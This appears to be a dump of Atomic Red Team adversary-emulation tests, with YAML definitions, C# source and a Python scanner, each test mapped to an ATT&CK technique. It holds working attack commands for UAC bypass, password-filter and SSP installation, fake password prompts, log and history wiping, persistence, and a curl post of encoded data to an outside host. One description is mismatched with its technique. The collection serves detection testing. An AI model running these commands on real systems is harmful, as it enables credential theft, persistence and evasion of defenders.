Bypass 24 | description: | 25 | Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file 26 | 27 | supported_platforms: 28 | - windows 29 | 30 | input_arguments: 31 | inf_file_uac: 32 | description: Path to the INF file 33 | type: path 34 | default: T1191_uacbypass.inf 35 | 36 | executor: 37 | name: command_prompt 38 | command: | 39 | cmstp.exe /s #{inf_file_uac} /au 40 | -------------------------------------------------------------------------------- /tests/T1098/T1098.todo: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1098 3 | display_name: Account Manipulation 4 | 5 | atomic_tests: 6 | - name: Admin Account Manipulate 7 | description: | 8 | Manipulate Admin Account Name 9 | supported_platforms: 10 | - windows 11 | executor: 12 | name: powershell 13 | command: | 14 | $x = Get-Random -Minimum 2 -Maximum 9999 15 | $y = Get-Random -Minimum 2 -Maximum 9999 16 | $z = Get-Random -Minimum 2 -Maximum 9999 17 | $w = Get-Random -Minimum 2 -Maximum 9999 18 | Write-Host HaHaHa_$x$y$z$w 19 | 20 | $hostname = (Get-CIMInstance CIM_ComputerSystem).Name 21 | 22 | $fmm = Get-CimInstance -ClassName win32_group -Filter "name = 'Administrators'" | Get-CimAssociatedInstance -Association win32_groupuser | Select Name 23 | 24 | foreach($member in $fmm) { 25 | if($member -like "*Administrator*") { 26 | Rename-LocalUser -Name $member.Name -NewName "HaHaHa_$x$y$z$w" 27 | Write-Host "Successfully Renamed Administrator Account on" $hostname 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /tests/T1062/T1062.todo: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1062 3 | display_name: Hypervisor 4 | 5 | atomic_tests: 6 | - name: Installing Hyper-V Feature 7 | description: | 8 | PowerShell command to check if Hyper-v is installed . 
9 | Install Hyper-V feature. 10 | Create a New-VM 11 | 12 | supported_platforms: 13 | - windows 14 | 15 | input_arguments: 16 | hostname: 17 | description: Host to query to see if Hyper-V feature is installed. 18 | type: string 19 | default: test-vm 20 | vm_name: 21 | description: Create a new VM. 22 | type: string 23 | default: testvm 24 | file_location: 25 | description: Location of new VHDX file 26 | type: string 27 | default: C:\Temp\test.vhdx 28 | 29 | executor: 30 | name: powershell 31 | command: | 32 | Get-WindowsFeature -Name Hyper-V -ComputerName #{hostname} 33 | Install-WindowsFeature -Name Hyper-V -ComputerName #{hostname} -IncludeManagementTools 34 | New-VM -Name #{vm_name} -MemoryStartupBytes 1GB -NewVHDPath #{file_location} -NewVHDSizeBytes 21474836480 35 | -------------------------------------------------------------------------------- /tests/T1223/T1223.todo: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1223 3 | display_name: Compiled HTML File 4 | 5 | atomic_tests: 6 | - name: Compiled HTML Help Local Payload 7 | description: | 8 | Uses hh.exe to execute a local compiled HTML Help payload. 9 | 10 | supported_platforms: 11 | - windows 12 | 13 | input_arguments: 14 | local_chm_file: 15 | description: Local .chm payload 16 | type: path 17 | default: C:\atomic-red-team\atomics\T1223\src\T1223.chm 18 | 19 | executor: 20 | name: command_prompt 21 | command: | 22 | hh.exe #{local_chm_file} 23 | 24 | - name: Compiled HTML Help Remote Payload 25 | description: | 26 | Uses hh.exe to execute a remote compiled HTML Help payload. 
27 | 28 | supported_platforms: 29 | - windows 30 | 31 | input_arguments: 32 | remote_chm_file: 33 | description: Remote .chm payload 34 | type: url 35 | default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1223/src/T1223.chm 36 | 37 | executor: 38 | name: command_prompt 39 | command: | 40 | hh.exe #{remote_chm_file} -------------------------------------------------------------------------------- /tests/T1064/T1064.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1064 3 | display_name: Scripting 4 | tactic: Defense Evasion, Execution 5 | description: Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts. 6 | 7 | atomic_tests: 8 | - name: Create and Execute scripts 9 | description: | 10 | Creates and executes a simple bash script. 
11 | 12 | supported_platforms: 13 | - macos 14 | - linux 15 | 16 | executor_nix: 17 | name: sh 18 | command: | 19 | sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh" 20 | sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh" 21 | chmod +x /tmp/art.sh 22 | sh /tmp/art.sh -------------------------------------------------------------------------------- /tests/T1174/T1174.todo: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1174 3 | display_name: Password Filter DLL 4 | 5 | atomic_tests: 6 | - name: Install and Register Password Filter DLL 7 | description: | 8 | Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. 9 | 10 | supported_platforms: 11 | - windows 12 | 13 | input_arguments: 14 | input_dll: 15 | description: Path to DLL to be installed and registered 16 | type: Path 17 | default: C:\AtomicRedTeam\atomics\T1174\src\AtomicPasswordFilter.dll 18 | 19 | executor: 20 | name: powershell 21 | command: | 22 | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename 23 | $lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" 24 | $notificationPackagesValues = $lsaKey.GetValue("Notification Packages") 25 | $notificationPackagesValues += $passwordFilterName 26 | Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Notification Packages" $notificationPackagesValues 27 | Restart-Computer -Confirm -------------------------------------------------------------------------------- /tests/T1123/T1123.todo: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1123 3 | display_name: Audio Capture 4 | 5 | atomic_tests: 6 | - name: SourceRecorder via Windows command prompt 7 | description: | 8 | Create a file called test.wma, with the duration of 30 seconds 9 | 10 | supported_platforms: 11 | - windows 12 | 13 | input_arguments: 
14 | output_file: 15 | description: Path to the recording file being captured 16 | type: Path 17 | default: test.wma 18 | 19 | duration_hms: 20 | description: Duration of audio to be recorded (in h:m:s format) 21 | type: Path 22 | default: 0000:00:30 23 | 24 | executor: 25 | name: command_prompt 26 | command: | 27 | SoundRecorder /FILE #{output_file} /DURATION #{duration_hms} 28 | 29 | - name: PowerShell Cmdlet via Windows command prompt 30 | description: | 31 | [AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet) 32 | supported_platforms: 33 | - windows 34 | executor: 35 | name: command_prompt 36 | command: | 37 | powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet 38 | -------------------------------------------------------------------------------- /tests/T1113/T1113.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1113 3 | display_name: Screen Capture 4 | tactic: Collection 5 | description: Adversaries may attempt to get a listing of local system or domain accounts. Windows commands that can acquire this information are net user, net group , and net localgroup using the Net utility or through use of dsquery. 
6 | 7 | atomic_tests: 8 | - name: Screencapture 9 | description: | 10 | Use screencapture command to collect a full desktop screenshot 11 | Use xwd command to collect a full desktop screenshot and review file with xwud 12 | Use import command to collect a full desktop screenshot 13 | 14 | supported_platforms: 15 | - macos 16 | - linux 17 | 18 | input_arguments: 19 | output_file: 20 | description: | 21 | xxx 22 | type: Path 23 | default: desktop.png 24 | 25 | executor_nix: 26 | name: bash 27 | command: | 28 | screencapture #{output_file} 29 | screencapture -x #{output_file} 30 | xwd -root -out #{output_file} 31 | xwud -in #{output_file} 32 | import -window root #{output_file} -------------------------------------------------------------------------------- /tests/T1031/T1031.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1031 3 | display_name: Modify Existing Service 4 | tactic: Persistence 5 | description: Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and Reg. Adversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API. 6 | 7 | atomic_tests: 8 | - name: Modify Fax service to run PowerShell 9 | description: | 10 | This test will temporarily modify the service Fax by changing the binPath to PowerShell 11 | and will then revert the binPath change, restoring Fax to its original state. 
12 | 13 | supported_platforms: 14 | - windows 15 | 16 | executor_cmd: 17 | name: command_prompt 18 | command: | 19 | sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1031 Test'\"" 20 | sc start Fax 21 | sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" 22 | -------------------------------------------------------------------------------- /tests/T1216/payloads/T1216.sct: -------------------------------------------------------------------------------- 1 | 2 | 3 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 22 | 23 | -------------------------------------------------------------------------------- /tests/T1148/T1148.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1148 3 | display_name: HISTCONTROL 4 | tactic: Defense Evasion 5 | description: The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to "ignorespace". HISTCONTROL can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. 6 | 7 | atomic_tests: 8 | - name: Disable history collection 9 | description: | 10 | Disables history collection in shells 11 | 12 | supported_platforms: 13 | - linux 14 | - macos 15 | 16 | executor_nix: 17 | name: sh 18 | command: | 19 | export HISTCONTROL=ignoreboth 20 | ls #{evil_command} 21 | 22 | executor_man: 23 | name: manual 24 | steps: | 25 | 1. export HISTCONTROL=ignoreboth 26 | 2. echo export "HISTCONTROL=ignoreboth" >> ~/.bash_profile 27 | 3. ls 28 | 4. 
whoami > recon.txt 29 | -------------------------------------------------------------------------------- /tests/T1070/T1070.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1070 3 | display_name: Indicator Removal on Host 4 | tactic: Defense Evasion 5 | description: Adversaries may delete or alter generated event files on a host system, including potentially captured files such as quarantined malware. This may compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine what occurred. 6 | 7 | atomic_tests: 8 | - name: Clear Logs 9 | description: | 10 | Clear Windows Event Logs 11 | Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. 12 | Delete system and audit logs 13 | 14 | supported_platforms: 15 | - windows 16 | - macos 17 | - linux 18 | 19 | executor_cmd: 20 | name: command_prompt 21 | command: | 22 | wevtutil cl #{log_name} 23 | fsutil #{usn deletejournal /D C:} 24 | 25 | executor_nix: 26 | name: sh 27 | command: | 28 | rm -rf /private/var/log/system.log* 29 | rm -rf /private/var/audit/* 30 | -------------------------------------------------------------------------------- /tests/T1141/T1141.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1141 3 | display_name: Input Prompt 4 | tactic: Credential Access 5 | description: When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task. Adversaries can mimic this functionality to prompt users for credentials with a normal-looking prompt. This type of prompt can be accomplished with AppleScript. 
6 | 7 | atomic_tests: 8 | - name: Prompt User for Password 9 | description: | 10 | Prompt User for Password (Local Phishing) 11 | Reference: "http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html" 12 | 13 | supported_platforms: 14 | - macos 15 | 16 | executor_nix: 17 | name: sh 18 | command: | 19 | osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"' 20 | -------------------------------------------------------------------------------- /tests/T1132/T1132.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1132 3 | display_name: Data Encoding 4 | tactic: Command and Control 5 | description: Command and control (C2) information is encoded using a standard data encoding system. Use of data encoding may be to adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, UTF-8, or other binary-to-text and character encoding systems. Some data encoding systems may also result in data compression, such as gzip. 6 | 7 | atomic_tests: 8 | - name: Base64 Encoded data. 9 | description: | 10 | Utilizing a common technique for posting base64 encoded data. 11 | 12 | supported_platforms: 13 | - macos 14 | - linux 15 | 16 | input_arguments: 17 | destination_url: 18 | description: Destination URL to post encoded data. 19 | type: string 20 | default: redcanary.com 21 | base64_data: 22 | description: Encoded data to post using fake Social Security number 111-11-1111. 
23 | type: string 24 | default: MTExLTExLTExMTE= 25 | 26 | executor_nix: 27 | name: sh 28 | command: | 29 | echo -n 111-11-1111 | base64 30 | curl -XPOST #{base64_data}.#{destination_url} 31 | -------------------------------------------------------------------------------- /tests/T1022/T1022.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1022 3 | display_name: Data Encrypted 4 | tactic: Exfiltration 5 | description: Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip. 6 | 7 | atomic_tests: 8 | - name: Data Encryption 9 | description: | 10 | Encrypt data 11 | 12 | supported_platforms: 13 | - macos 14 | - centos 15 | - ubuntu 16 | - linux 17 | 18 | executor_nix: 19 | name: sh 20 | command: | 21 | echo "This file will be encrypted" > /tmp/victim-gpg.txt 22 | mkdir /tmp/victim-files 23 | cd /tmp/victim-files 24 | touch a b c d e f g 25 | zip --password "insert password here" /tmp/victim-files.zip /tmp/victim-files/* 26 | gpg -c /tmp/victim-gpg.txt 27 | 28 | ls -l 29 | -------------------------------------------------------------------------------- /tests/T1101/T1101.todo: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1101 3 | display_name: Security Support Provider 4 | 5 | atomic_tests: 6 | - name: Modify SSP configuration in registry 7 | description: Add a value to a Windows registry SSP key, simulating an adversarial modification of those keys. 
8 | supported_platforms: 9 | - windows 10 | input_arguments: 11 | fake_ssp_dll: 12 | description: Value added to registry key. Normally refers to a DLL name in C:\Windows\System32. 13 | type: String 14 | default: not-a-ssp 15 | 16 | executor: 17 | name: powershell 18 | command: | 19 | # run these in sequence 20 | $SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages' 21 | $SecurityPackagesUpdated = $SecurityPackages 22 | $SecurityPackagesUpdated += "#{fake_ssp_dll}" 23 | Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated 24 | 25 | # revert (before reboot) 26 | Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages 27 | -------------------------------------------------------------------------------- /tests/T1142/T1142.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1142 3 | display_name: Keychain 4 | tactic: Credential Access 5 | description: Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in ~/Library/Keychains/,/Library/Keychains/, and /Network/Library/Keychains/. The security command-line utility, which is built into macOS by default, provides a useful way to manage these credentials. 
6 | 7 | atomic_tests: 8 | - name: Keychain 9 | description: | 10 | ### Keychain Files 11 | 12 | ~/Library/Keychains/ 13 | 14 | /Library/Keychains/ 15 | 16 | /Network/Library/Keychains/ 17 | 18 | [Security Reference](https://developer.apple.com/legacy/library/documentation/Darwin/Reference/ManPages/man1/security.1.html) 19 | 20 | [Keychain dumper](https://github.com/juuso/keychaindump) 21 | 22 | supported_platforms: 23 | - macos 24 | 25 | executor_nix: 26 | name: sh 27 | command: | 28 | security -h 29 | security find-certificate -a -p > allcerts.pem 30 | security import /tmp/certs.pem -k 31 | -------------------------------------------------------------------------------- /tests/T1146/T1146.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1146 3 | display_name: Clear Command History 4 | tactic: Defense Evasion 5 | description: macOS and Linux both keep track of the commands users type in their terminal so that users can easily remember what they've done. These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. 
6 | 7 | atomic_tests: 8 | - name: Clear Bash history (rm) 9 | description: | 10 | Clears bash history via rm 11 | Clears bash history vie echo 12 | Clears bash history via cat /dev/null 13 | Clears bash history via a symlink to /dev/null 14 | Clears bash history via truncate 15 | Clears the history of a bunch of different shell types by setting the history size to zero 16 | 17 | supported_platforms: 18 | - linux 19 | - macos 20 | 21 | executor_nix: 22 | name: sh 23 | command: | 24 | rm ~/.bash_history 25 | echo "" > ~/.bash_history 26 | cat /dev/null > ~/.bash_history 27 | ln -sf /dev/null ~/.bash_history 28 | truncate -s0 ~/.bash_history 29 | unset HISTFILE 30 | export HISTFILESIZE=0 31 | history -c 32 | -------------------------------------------------------------------------------- /tests/T1180/T1180.todo: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1180 3 | display_name: Screensaver 4 | 5 | atomic_tests: 6 | - name: Set Arbitrary Binary as Screensaver 7 | description: | 8 | This test copies a binary into the Windows System32 folder and sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. 
9 | 10 | supported_platforms: 11 | - windows 12 | 13 | input_arguments: 14 | input_binary: 15 | description: Executable binary to use in place of screensaver for persistence 16 | type: path 17 | default: C:\Windows\System32\cmd.exe 18 | 19 | executor: 20 | name: command_prompt 21 | command: | 22 | copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr" 23 | reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f 24 | reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverTimeout /t REG_SZ /d 60 /f 25 | reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f 26 | reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f 27 | shutdown /r /t 0 28 | 29 | -------------------------------------------------------------------------------- /tests/T1150/T1150.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1150 3 | display_name: Plist Modification 4 | tactic: Defense Evasion, Persistence, Privilege Escalation 5 | description: Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UT-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. Adversaries can modify these plist files to point to their own code, can use them to execute their code in the context of another user, bypass whitelisting procedures, or even use them as a persistence mechanism. 6 | 7 | atomic_tests: 8 | - name: Plist Modification 9 | description: | 10 | Modify PlistTODO 11 | 12 | supported_platforms: 13 | - macos 14 | 15 | executor_man: 16 | name: manual 17 | steps: | 18 | 1. 
Modify a .plist in 19 | 20 | /Library/Preferences 21 | 22 | OR 23 | 24 | ~/Library/Preferences 25 | 26 | 2. Subsequently, follow the steps for adding and running via [Launch Agent](Persistence/Launch_Agent.md) 27 | 28 | 29 | -------------------------------------------------------------------------------- /tests/T1165/T1165.todo: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1165 3 | display_name: Startup Items 4 | 5 | atomic_tests: 6 | - name: Startup Items 7 | description: | 8 | Modify or create an file in StartupItems 9 | 10 | [Reference](https://www.alienvault.com/blogs/labs-research/diversity-in-recent-mac-malware) 11 | 12 | supported_platforms: 13 | - macos 14 | 15 | executor: 16 | name: manual 17 | steps: | 18 | 1. /Library/StartupItems/StartupParameters.plist 19 | 20 | - name: Startup Items (emond rule) 21 | description: | 22 | Establish persistence via a rule run by emond daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 23 | 24 | supported_platforms: 25 | - macos 26 | 27 | input_arguments: 28 | plist: 29 | description: Path to emond plist file 30 | type: path 31 | default: /path/to/T1165_emond.plist 32 | 33 | executor: 34 | name: sh 35 | command: | 36 | sudo cp "#{plist}" /etc/emond.d/rules/T1165_emond.plist 37 | sudo touch /private/var/db/emondClients/T1165 38 | #Clean up 39 | sudo rm /etc/emond.d/rules/T1165_emond.plist 40 | sudo rm /private/var/db/emondClients/T1165 41 | -------------------------------------------------------------------------------- /tests/T1165/T1165_emond.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | name 7 | Atomic Red Team T1165 8 | enabled 9 | 10 | eventTypes 11 | 12 | startup 13 | 14 | actions 15 | 16 | 17 | command 18 | /bin/sleep 19 | user 20 | root 21 | arguments 22 | 23 | 30 24 | 25 | type 26 | RunCommand 27 | 28 | 29 | command 30 | 
/usr/bin/say
user
root
arguments
-v
Karen
Hello from Atomic Red Team technique T1165
type
RunCommand
--------------------------------------------------------------------------------
/tests/T1164/T1164.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1164
display_name: Re-Opened Applications

atomic_tests:
- name: Re-Opened Applications
  description: |
    Plist Method

    [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html)

  supported_platforms:
  - macos

  executor:
    name: manual
    steps: |
      1. create a custom plist:

         ~/Library/Preferences/com.apple.loginwindow.plist

         or

         ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist

- name: Re-Opened Applications
  description: |
    Mac Defaults: register a LoginHook script with the defaults command, then remove it again.

    [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html)

  supported_platforms:
  - macos

  input_arguments:
    script:
      description: path to script
      type: path
      default: /path/to/script

  executor:
    name: sh
    command: |
      sudo defaults write com.apple.loginwindow LoginHook #{script}
      sudo defaults delete com.apple.loginwindow LoginHook
--------------------------------------------------------------------------------
/tests/T1159/T1159.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1159
display_name: Launch Agent

atomic_tests:
- name: Launch Agent
  description: |
    Create a plist and execute it

  supported_platforms:
  - macos

  executor:
    name: manual
    steps: |
      1. Create a file named .client (the ProgramArguments path in the plist below points at it) containing:

      2. osascript -e 'tell app "Finder" to display dialog "Hello World"'

      3. Place the following in a new file under ~/Library/LaunchAgents as com.atomicredteam.plist

      4.
         <?xml version="1.0" encoding="UTF-8"?>
         <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
         <plist version="1.0">
         <dict>
             <key>KeepAlive</key>
             <true/>
             <key>Label</key>
             <string>com.client.client</string>
             <key>ProgramArguments</key>
             <array>
                 <string>/Users//.client</string>
             </array>
             <key>RunAtLoad</key>
             <true/>
             <key>NSUIElement</key>
             <string>1</string>
         </dict>
         </plist>

      5. launchctl load -w ~/Library/LaunchAgents/com.atomicredteam.plist
--------------------------------------------------------------------------------
/tests/T1085/T1085.sct:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/tests/T1140/T1140.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1140
display_name: Deobfuscate/Decode Files Or Information

atomic_tests:
- name: Deobfuscate/Decode Files Or Information
  description: |
    Encode/Decode executable

  supported_platforms:
  - windows

  input_arguments:
    executable:
      description: name of executable
      type: path
      default: c:\file.exe

  executor:
    name: command_prompt
    command: |
      certutil.exe -encode #{executable} file.txt
      certutil.exe -decode file.txt #{executable}

- name: Certutil Rename and Decode
  description: |
    Rename certutil and decode a file.
    This is in reference to latest research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)

  supported_platforms:
  - windows

  input_arguments:
    executable:
      description: name of the base64-encoded file to decode
      type: path
      default: c:\file.exe
    output_file:
      # certutil -decode requires both an input and an output path
      description: path the decoded file is written to
      type: path
      default: '%temp%\decoded.exe'

  executor:
    name: command_prompt
    command: |
      cmd.exe /c copy %windir%\system32\certutil.exe %temp%\tcm.tmp
      cmd.exe /c %temp%\tcm.tmp -decode #{executable} #{output_file}
--------------------------------------------------------------------------------
/tests/T1118/src/T1118.cs:
--------------------------------------------------------------------------------
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;

/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Step One:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library T1118.cs
Step Two:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /U /logfile= /logtoconsole=false T1118.dll
*/

public class Program
{
    public static void Main()
    {
        Console.WriteLine("Hey There From Main()");
        //Add any behaviour here to throw off sandbox execution/analysts :)
        //These binaries can exhibit one behavior when executed in sandbox, and entirely different one when invoked
        //by InstallUtil.exe
    }

}

[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer
{
    //The Methods can be Uninstall/Install. Install is transactional, and really unnecessary.
    public override void Uninstall(System.Collections.IDictionary savedState)
    {
        Console.WriteLine("Hello There From Uninstall, If you are reading this, prevention has failed.\n");
    }
}
--------------------------------------------------------------------------------
/tests/T1010/T1010.md:
--------------------------------------------------------------------------------
# T1010 - Application Window Discovery
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1010)
Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.

In Mac, this can be done natively with a small [AppleScript](https://attack.mitre.org/techniques/T1155) script.

## Atomic Tests

- [Atomic Test #1 - List Process Main Windows - C# .NET](#atomic-test-1---list-process-main-windows---c-net)

## Atomic Test #1 - List Process Main Windows - C# .NET
Compiles and executes C# code to list main window titles associated with each process.

**Supported Platforms:** Windows

#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_source_code | Path to source of C# code | path | C:\AtomicRedTeam\atomics\T1010\src\T1010.cs |
| output_file_name | Name of output binary | string | T1010.exe |

#### Run it with `command_prompt`!
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code}
#{output_file_name}
```
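The two T1140 tests above rely on `certutil -encode` wrapping an arbitrary file in `-----BEGIN CERTIFICATE-----` armor, 64 base64 characters per line, so the encoded payload passes as a certificate to a casual look. The following is an added example (not code from the Atomic Red Team repository) that turns that into a check: it decodes every such block in a text file and classifies what is really behind the armor. A genuine DER certificate begins with an ASN.1 SEQUENCE tag (0x30); a Windows executable begins with `MZ`. The sample input is constructed inline; the `FAKE_PE` and `FAKE_DER` blobs are stand-ins, not real files.

```python
"""Flag certutil-style CERTIFICATE armor whose payload is not a certificate."""
import base64
import hashlib
import re
from typing import Dict, List

ARMOR_RE = re.compile(
    rb"-----BEGIN CERTIFICATE-----\r?\n(.*?)\r?\n-----END CERTIFICATE-----",
    re.S,
)


def certutil_encode(data: bytes) -> bytes:
    """Reproduce the layout certutil.exe -encode writes (used here to build test input)."""
    b64 = base64.b64encode(data)
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return (b"-----BEGIN CERTIFICATE-----\r\n" + b"\r\n".join(lines)
            + b"\r\n-----END CERTIFICATE-----\r\n")


def classify(payload: bytes) -> str:
    """Coarse file-type check on the decoded bytes."""
    if payload[:2] == b"MZ":
        return "pe"
    if payload[:4] == b"\x7fELF":
        return "elf"
    if payload[:1] == b"\x30":
        return "der"  # ASN.1 SEQUENCE: what a real certificate looks like
    return "other"


def scan_armored(text: bytes) -> List[Dict]:
    """Decode each CERTIFICATE block in `text`; anything that is not DER is suspicious."""
    findings = []
    for match in ARMOR_RE.finditer(text):
        body = re.sub(rb"\s+", b"", match.group(1))
        try:
            payload = base64.b64decode(body, validate=True)
        except ValueError:
            findings.append({"kind": "invalid-base64", "size": 0, "sha256": None})
            continue
        findings.append({
            "kind": classify(payload),
            "size": len(payload),
            "sha256": hashlib.sha256(payload).hexdigest(),
        })
    return findings


# Constructed sample input: a fake DER blob and a fake PE stub, both armored the way
# `certutil -encode` writes them, inside an otherwise harmless text file.
FAKE_DER = b"\x30\x82\x01\x00" + b"\x02\x01\x01" * 20
FAKE_PE = b"MZ\x90\x00" + bytes(range(256)) * 3 + b"PE\x00\x00"
SAMPLE_TEXT = (b"notes.txt\r\n" + certutil_encode(FAKE_DER) + b"\r\n"
               + certutil_encode(FAKE_PE))

if __name__ == "__main__":
    for finding in scan_armored(SAMPLE_TEXT):
        flag = "" if finding["kind"] == "der" else "  <-- not a certificate"
        print(f"{finding['kind']:14} {finding['size']:6} bytes  {finding['sha256']}{flag}")
```

Run against the `file.txt` that the first T1140 test writes, `scan_armored` reports `pe` for the block, which is the signal a real certificate file never gives; the SHA-256 of the decoded payload is the value to pivot on in a hash-based lookup, since the armored file itself hashes to something unrelated.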
--------------------------------------------------------------------------------
/tests/T1065/T1065.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1065
display_name: Uncommonly Used Port
description: Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls.

atomic_tests:
- name: Testing usage of uncommonly used port with PowerShell
  description: |
    Testing uncommonly used port utilizing PowerShell

  supported_platforms:
  - windows

  input_arguments:
    port:
      description: Specify uncommon port number
      type: String
      default: "8081"
    domain:
      description: Specify target hostname
      type: String
      default: google.com

  executor:
    name: powershell
    command: |
      test-netconnection -ComputerName #{domain} -port #{port}

- name: Testing usage of uncommonly used port
  description: |
    Testing uncommonly used port utilizing telnet.

  supported_platforms:
  - linux
  - macos

  input_arguments:
    port:
      description: Specify uncommon port number
      type: String
      default: "8081"
    domain:
      description: Specify target hostname
      type: String
      default: google.com

  executor:
    name: sh
    command: |
      telnet #{domain} #{port}
--------------------------------------------------------------------------------
/tests/T1075/T1075.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1075
display_name: Pass the Hash

atomic_tests:
